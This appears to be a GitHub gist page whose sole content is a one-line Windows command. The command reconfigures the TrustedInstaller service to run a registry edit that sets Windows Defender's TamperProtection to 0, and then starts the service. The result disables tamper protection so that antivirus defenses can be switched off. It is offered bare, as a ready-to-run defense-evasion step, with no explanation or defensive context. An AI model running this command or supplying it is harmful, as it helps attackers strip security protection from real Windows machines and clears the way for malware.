Skip to content

Instantly share code, notes, and snippets.

@fiercebrute
Created December 12, 2019 04:47
Show Gist options
  • Save fiercebrute/1cf668980dbd953a2cd0f4ea98e4f5f0 to your computer and use it in GitHub Desktop.
Save fiercebrute/1cf668980dbd953a2cd0f4ea98e4f5f0 to your computer and use it in GitHub Desktop.
sc config TrustedInstaller binpath= "cmd.exe /C reg add """HKLM\Software\Microsoft\Windows Defender\Features""" /v TamperProtection /t REG_DWORD /d 0 /f" && sc start TrustedInstaller
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment